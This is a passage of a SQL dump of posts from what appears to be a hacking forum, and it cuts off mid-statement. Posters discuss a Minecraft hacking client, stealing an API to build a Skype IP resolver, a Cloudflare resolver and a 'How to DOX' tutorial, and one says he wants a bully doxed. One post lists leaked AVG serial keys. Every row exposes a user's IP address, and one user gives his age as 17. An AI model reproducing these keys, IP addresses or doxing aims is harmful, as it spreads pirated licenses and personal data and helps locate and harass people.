`icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3740', '715', '3642', '23', 'RE: Free HostGator Hosting! [N00B Friendly]', '0', '205', 'mothered', '1349607512', 'Going to definitely look Into this. Much appreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'aa91ed53ffae4c2437e0627a06e8a8c6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3741', '706', '3633', '4', 'RE: Supppp', '0', '205', 'mothered', '1349607608', 'Quite an Impressive Introduction you have there mate. Welcome aboard, and enjoy your stay.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '733455a74470184aec2100669f7630b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3742', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '214', 'Rave™', '1349608251', 'I\'m sorry I thought you were aware, it\'s like a hacking client for minecraft. I coded it.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'ceee636d77bddc116b7bf0580d5a7546', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3743', '718', '3645', '16', 'RE: Apple Cookie Case', '0', '214', 'Rave™', '1349608471', 'Something like this case was ripped or damaged or doesnt fit properly.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'd5328e3521015a9f08d8f9262b64f5a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3744', '736', '0', '7', 'Should I make a l33thacking Skype resolver?', '0', '214', 'Rave™', '1349608570', 'Guys do you think I should, I would need to steal an API but I can do it.;)', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '0ff1369c8238f76f98aa2b97546daa15', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3745', '698', '3557', '7', 'RE: Skype group anyone?', '0', '214', 'Rave™', '1349608617', 'I would love to be a part Add me or I\'ll add you spushkin1', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '489fad50aea1b5dbf93723d48f65f68e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3746', '737', '0', '7', 'Just voted', '6', '214', 'Rave™', '1349608733', 'Just voted, we are gonna be at the top one day. Hackforums is garbage with a fag like omni in charge, leakforums or boring, ubers is dead, I see an opening for us.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '64c57e173d436d9456aa36e4d1319103', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3747', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '214', 'Rave™', '1349608899', 'I can do this tommorow, add me on Skype spushkin1', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '91e947c433a1fd10d8cf19dba9301d71', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3748', '637', '3747', '16', 'RE: I need to SE a gaming keyboard', '0', '62', 'R?????zo?', '1349609441', '[quote=\'Kasual\' pid=\'3747\' dateline=\'1349608899\'] I can do this tommorow, add me on Skype spushkin1 [/quote] added you.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a014b8d694cb5e52a852b026bbdd1726', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3749', '737', '3746', '7', 'RE: Just voted', '0', '53', 'sirchamp', '1349612943', 'Hf isnt garbage. Its full of trolls tough', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '5d8c1931aea549159e2a7de45b579bf0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3750', '214', '856', '52', 'RE: [tut] Creating a IPod PID Generator', '0', '214', 'Rave™', '1349613260', 'Can someone help me with this?', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '7cef0ff2a2df419fda2b02c22ccd5f11', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3751', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '100', '??zg???g????61', '1349613864', 'You coded it? Cool ill download this now.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '8c9ce371c7146affb8429c4bf3e54e21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3752', '718', '3645', '16', 'RE: Apple Cookie Case', '0', '100', '??zg???g????61', '1349613997', 'Thanks ill try this later', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '05e2e1148d1309ae1bf37ea13cce5f1c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3753', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '100', '??zg???g????61', '1349614110', 'Traffic bots fuuuuuck :( this is a sad day for LH', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'd7f1cb5a635ad860dffbb4002938ecc7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3754', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '100', '??zg???g????61', '1349614418', 'Awww shit thanks..! I need a good CF resolver. For those of you that dont know how this works, its for resolving the IP of cloudflare protected websites.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '6962050f620cc9e8f6f4455f089335bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3755', '736', '3744', '7', 'RE: Should I make a l33thacking Skype resolver?', '0', '100', '??zg???g????61', '1349614492', 'Go for it! Make it web based(;', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'a5567179ef629facd716162ad8017c23', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3756', '705', '3617', '61', 'RE: Minecraft Accounts', '0', '100', '??zg???g????61', '1349614930', 'Hey ipod hmu with some of these', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'b3c0c8606f254bccef756765373da07a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3757', '736', '3744', '7', 'RE: Should I make a l33thacking Skype resolver?', '0', '214', 'Rave™', '1349615389', 'Just stole an API. Working on a nice source right now.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'e71e547671f28c0c55d0e09a7c5cef37', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3758', '50', '132', '12', 'RE: [tut]How to DOX', '0', '100', '??zg???g????61', '1349616153', 'Awesome, this is going to be useful in the future.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '980d374339e2ac59a70fea398dc65473', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3759', '655', '3253', '43', 'RE: ANY CS5 AND SOME CS4 ADOBE SERIALS', '0', '100', '??zg???g????61', '1349616231', 'Suit yourself ;) with keys its much less of a hassle. I think you get updates as well.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '3825f960a50c751bcdcaf1d5559f7eda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3760', '738', '0', '43', '[LEAK] AVG 2013 Serial Keys', '0', '100', '??zg???g????61', '1349616554', 'Here they are ;D 8MEH-RF4BZ-FHATO-VRV3A-47LOJ-DEMBR-ACED 8MEH-R6BFE-HWUHF-DPNDA-VXECY-2EMBR-ACED 8MEH-RTN2Z-UDLMK-6RWGA-AJPK7-VEMBR-ACED 8MEH-R6O2P-VYKXS-BAYWR-CNCZX-WEMBR-ACED 8MEH-R9Q3V-ZHN2T-92KCR-AHE9W-YEMBR-ACED 8MEH-RAJC2-O3P77-KRRQA-HFTKK-REMBR-ACED 8MEH-RPDWL-THRLY-O8Z3R-4R3YG-4EMBR-ACED 8MEH-RTW3W-YQLQ3-KUK8A-RQNV9-OEMBR-ACED Enjoy!', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '4e41f9554b42a6dc0583ba48832e35dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3761', '736', '3744', '7', 'RE: Should I make a l33thacking Skype resolver?', '0', '100', '??zg???g????61', '1349616844', 'Awesome :D btw your signature is broken.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '07c12a1c43d91a91b065ef9e926653b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3762', '739', '0', '59', '? $400+/DAY ! Ultimate E-Whoring Guide ?', '0', '213', 'BitMonst3r', '1349616888', '[img]http://i.imgur.com/8i8N1.jpg[/img] Download: [code] http://adf.ly/D25TJ [/code] Password [code] -!Be@#)8The928Only_-+One7`~Who~#@17}WIN!0ºÃа§®°‘†‡} [/code] [img]http://img194.imageshack.us/img194/9834/pleasesaythanks.png[/img]', '62.212.207.52', '1054134068', '0', '0', '0', '0', '1', 'a1be87d37adb67c5d3b04e6d97d00e23', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3763', '740', '0', '3', 'I am only one who gets this error?', '0', '213', 'BitMonst3r', '1349617212', 'I am only one who gets this error? [spoiler] [img]http://imageshack.us/a/img689/4365/erorrq.png[/img] [/spoiler]', '62.212.207.52', '1054134068', '0', '0', '0', '0', '1', '3ca8e11d9c4fb550f0992ae99b5ce007', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3764', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '53', 'sirchamp', '1349617322', 'Username: Sirchamp Age: 17 Profile: http://l33thacking.net/user-53.html Info: I play mainly games for the computer. I game about 1h a day. I play cod2, cod6, cod7, skyrim, oblivion, fifa12 and minecraft', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f4625cedf1bc1b5ef3da97b6e0a07fd0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3765', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '213', 'BitMonst3r', '1349618716', 'Hmm looks like this is good forum. I will check it out.', '62.212.204.139', '1054133387', '0', '0', '0', '0', '1', '8f45d04a81d8f2601a4233e674b0b464', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3766', '741', '0', '9', '7 Videos That Will Show You How To Make Real Income Online!', '0', '213', 'BitMonst3r', '1349618884', '[align=center] [color=#1E90FF][size=x-large][b]7 Videos That Will Show You How To Make Real Income Online! [/b][/size][/color] [size=medium][b]TE Profits Part 1. Welcome[/b][/size] [video=youtube]http://www.youtube.com/watch?v=ZYolRKPIGes[/video] [size=medium][b]TE Profits Part 2. More Traffic with Less Surfing[/b][/size] [video=youtube]http://www.youtube.com/watch?v=y_79V9MIF_I[/video] [size=medium][b]TE Profits Part 3. TECP[/b][/size] [video=youtube]http://www.youtube.com/watch?v=JLbFgRmF1M4[/video] [size=medium][b]TE Profits Part 4. Active Downlines[/b][/size] [video=youtube]http://www.youtube.com/watch?v=edQkUHj7kBI[/video] [size=medium][b]TE Profits Part 5. Turning Your Traffic Into Cash[/b][/size] [video=youtube]http://www.youtube.com/watch?v=-VBjDiBOmfQ[/video] [size=medium][b]TE Profits Part 6. Setting up YourSurfBiz[/b][/size] [video=youtube]http://www.youtube.com/watch?v=xtO9eKB4eT8[/video] [size=medium][b]TE Profits Part 7. Residual Income with TEs[/b][/size] [video=youtube]http://www.youtube.com/watch?v=fSib--myLM4[/video] [size=large][b]Register For More Information And Tools![/b][/size] [size=large][b][color=#FF6347]Its 100% FREE[/color][/b][/size] [size=large][b][url=http://goo.gl/bAA7D]CLICK HERE TO REGISTER [/url][/b][/size] [b]Don\'t Understand something? Need help? Post here or pm me and i will help you. [/b] [b]Payment Proof[/b] [img]http://imageshack.us/a/img228/1756/paymenti.png[/img] [/align]', '62.212.204.139', '1054133387', '0', '0', '0', '0', '1', 'e80cd2755742d6a30584fa0e81b45d01', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3767', '740', '3763', '3', 'RE: I am only one who gets this error?', '0', '243', 'Anarchy $ucks', '1349619199', 'no you mad bro??!?! don\'t be so mad', '97.252.43.115', '1643916147', '0', '0', '0', '0', '1', 'c7202ad0ca2a63fd1921bffb6f5e2442', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3768', '739', '3762', '59', 'RE: ? $400+/DAY ! Ultimate E-Whoring Guide ?', '0', '100', '??zg???g????61', '1349619202', 'Nobody is going to buy an eWhoring guide.. -_-', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'd6b136dc35323782c79e6124985cb58d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3769', '273', '1249', '59', 'RE: ????Free Spreading Complete Ebook????', '0', '100', '??zg???g????61', '1349619274', 'Hey cool share bro, I\'d LOVE this link. I\'ve been looking for a spreading eBook. Thanks.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2aa1a98e58ced4137e8f455eea6a0181', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3782', '736', '3744', '7', 'RE: Should I make a l33thacking Skype resolver?', '0', '82', 'iTzIpod', '1349621168', 'Go for it. I\'ll use it (: If I find out that bully\'s skype, I\'ll be grateful.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2ccdf7326fdc8feaad88332062e90b43', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3771', '742', '0', '59', 'The Code Book: How to Make It, Break It, Hack It, Crack It', '0', '213', 'BitMonst3r', '1349619405', '[align=center][img]http://pixhost.me/avaxhome/80/f9/0021f980_medium.jpeg[/img] [size=x-large][b][url=http://adf.ly/DUg3x]Sales Page[/url][/b][/size] [size=x-large][b][url=http://adf.ly/DUfyu]Download[/url][/b][/size] [img]http://img194.imageshack.us/img194/9834/pleasesaythanks.png[/img][/align]', '62.212.204.139', '1054133387', '0', '0', '0', '0', '1', '1a9249b49d600cf362ee9632363468bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3772', '739', '3762', '59', 'RE: ? $400+/DAY ! Ultimate E-Whoring Guide ?', '0', '213', 'BitMonst3r', '1349619460', 'Dude you miss understood. Its free to download', '62.212.204.139', '1054133387', '0', '0', '0', '0', '1', 'f87a9c22d47cc5c6c056510a657e90c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3773', '735', '3735', '59', 'RE: Ultimate Bitcoin Guide! Earn for playing games & More!', '0', '82', 'iTzIpod', '1349620489', 'Nice guide. Don\'t really know what BitCoins are though. But I heard of it a couple of times.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd3b7215e8ba1a51fd046c68b68ccb0d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3774', '698', '3557', '7', 'RE: Skype group anyone?', '0', '82', 'iTzIpod', '1349620590', 'Can you add me ^? Add my Skype ID: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '185768bb0ee86962bc40be70d034f3aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3775', '737', '3746', '7', 'RE: Just voted', '0', '82', 'iTzIpod', '1349620663', 'HF is full of trolls, noobs, leechers, leakers, repfuckers, gays, and bronies. LF is alright. I kinda like it there. Ubers, meh. Don\'t care about it. Only registered 4 days ago or something.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'daaf4227dc0dddcdb7c212786b9ac7d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3776', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '82', 'iTzIpod', '1349620695', 'What does it do? Any previews of it? Any virus scans just in case?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4a334722f0c27dec97d84d12e3a12ec3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3777', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '82', 'iTzIpod', '1349620732', 'So I just enter in the URL of a website that contains a CloudFlare protection page thing?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fa35f274caaae6d0294ee5dbd377399f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3778', '705', '3617', '61', 'RE: Minecraft Accounts', '0', '82', 'iTzIpod', '1349620761', 'Aright. I\'ll PM you like 2 now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0a984cecdd7fffc7276106a41108855c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3779', '50', '132', '12', 'RE: [tut]How to DOX', '0', '82', 'iTzIpod', '1349620882', 'Nice guide. I still want someone to dox that guy though. (That bully)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ff4909614d7f5618f3881c9804f7fffd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3780', '740', '3763', '3', 'RE: I am only one who gets this error?', '0', '82', 'iTzIpod', '1349621074', '@Vocm, he didn\'t state that he was mad. He was just simply asking a question. OT: I get that too. It\'s just a problem with our hosting. But please hang in there!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7bd772e8acf2e1570194f386286c7429', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3781', '740', '3763', '3', 'RE: I am only one who gets this error?', '0', '213', 'BitMonst3r', '1349621145', 'Will this be fixed soon? I start to like this forum, but these errors are annoying', '62.212.204.139', '1054133387', '0', '0', '0', '0', '1', 'd4b3492657a62604dc31be122d2a3fa0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3783', '740', '3763', '3', 'RE: I am only one who gets this error?', '0', '243', 'Anarchy $ucks', '1349623380', 'Maybe its an exploit denial of service, ever heard of that (rofl)', '97.252.43.115', '1643916147', '0', '0', '0', '0', '1', '50c5d91d6f08a4988c2031c18ccf8901', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3784', '740', '3763', '3', 'RE: I am only one who gets this error?', '0', '1', 't3h jok3r', '1349633391', 'Everyones receiving that error. I\'m working on it, just need 2-4 days.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a8c878dccd1bd3e3a425613f4563b75a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3785', '736', '3744', '7', 'RE: Should I make a l33thacking Skype resolver?', '0', '1', 't3h jok3r', '1349633565', 'That would be a great idea because Skype IP resolvers are very useful and popular. I think program would be more easier to use and you won\'t need to invest if you are making it webbased.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'acf2e54cb75c337aa1c8f06d0c55e25d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3786', '706', '3633', '4', 'RE: Supppp', '0', '199', 'Anonymous™', '1349636137', 'Welcome to L33thacking Kasual!', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '72b6850cde704a0eb9d9341990a1f396', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3787', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349636204', 'http://www.youtube.com/watch?v=RbD1EIIY7kI&feature=channel&list=UL', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '7b30b144049115563139bec832d170d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3788', '698', '3557', '7', 'RE: Skype group anyone?', '0', '222', 'Exposé', '1349637151', 'Itzipod didn\'t I add you already?', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', '3fc18602b964e419ec9457ba45f43d56', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, 